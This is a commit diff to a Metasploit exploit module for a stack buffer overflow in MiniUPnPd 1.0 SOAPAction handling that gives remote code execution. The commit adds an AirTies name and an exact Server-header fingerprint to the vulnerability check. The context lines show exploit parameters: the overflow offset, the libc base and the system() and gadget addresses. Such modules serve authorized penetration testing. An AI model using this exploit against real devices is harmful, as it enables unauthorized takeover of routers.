fingerprint, title
parent
285d767e20
commit
8db88994ac
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
|
||||
'Name' => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
|
||||
present in the SOAPAction HTTP header handling.
|
||||
|
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Offset' => 2048,
|
||||
'LibcBase' => 0x2aabd000,
|
||||
'System' => 0x00031AC0,
|
||||
'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
|
||||
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
|
||||
'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0" # Fingerprint
|
||||
}
|
||||
],
|
||||
],
|
||||
|
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "/",
|
||||
})
|
||||
|
||||
if res && res.headers['Server'] =~ /miniupnpd\/1.0/
|
||||
if res && res.headers['Server'] == target['ServerHeader']
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
|
@ -74,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
print_status("#{peer} - Accessing the vulnerable URL...")
|
||||
print_status(target['ServerHeader'])
|
||||
|
||||
unless check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
|
||||
|
|
Loading…
Reference in New Issue